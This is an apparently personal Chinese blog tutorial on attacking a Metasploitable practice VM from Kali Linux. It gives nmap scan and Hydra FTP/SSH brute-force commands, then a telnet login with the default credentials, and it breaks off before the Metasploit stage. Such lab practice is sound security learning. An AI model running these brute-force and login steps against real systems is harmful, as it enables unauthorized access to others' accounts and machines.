kali渗透metasploitable靶机

metasploitable靶机先要安装上,否则没有靶机咋搞呢
下载metasploitable靶机看我另一篇附上链接请点我,我是链接
1.先是信息搜集
扫描阶段
工具(kali自带的nmap)
命令: nmap ip(例如我的是192.168.134.136)

接下来进行端口爆破: FTP，SSH等
工具:Hydra(原来他就是传说中的九头蛇)
别忘了搞一个字典，爆破需要。
我的反正是自己临时添加的

临时添加的非常常用的

一个是账户一个是密码
接下来就是爆破 FTP
命令: hydra -L /home/wenl/Desktop/user.txt -P /home/wenl/Desktop/pass.txt ftp://ip(我的是192.168.134.136)

继续爆破SSH
命令:hydra -L /home/wenl/Desktop/user.txt -P /home/wenl/Desktop/pass.txt ip(我的192.168.134.136) ssh

然后就可以登陆他的系统了，登录系统
telnet ip(我的192.168.134.136)

会让你登录
用户密码都是user
登陆系统后出现的是
这样就暂时性的ok
接下来的端口测试搞得糊涂了,先暂停。
还有就是端口测试要用到metasploit
打开matasploit命令是msfconsole
也比较强悍
更详细的参考这个大佬,附上链接添加链接描述http://www.vbboy.com/?id=13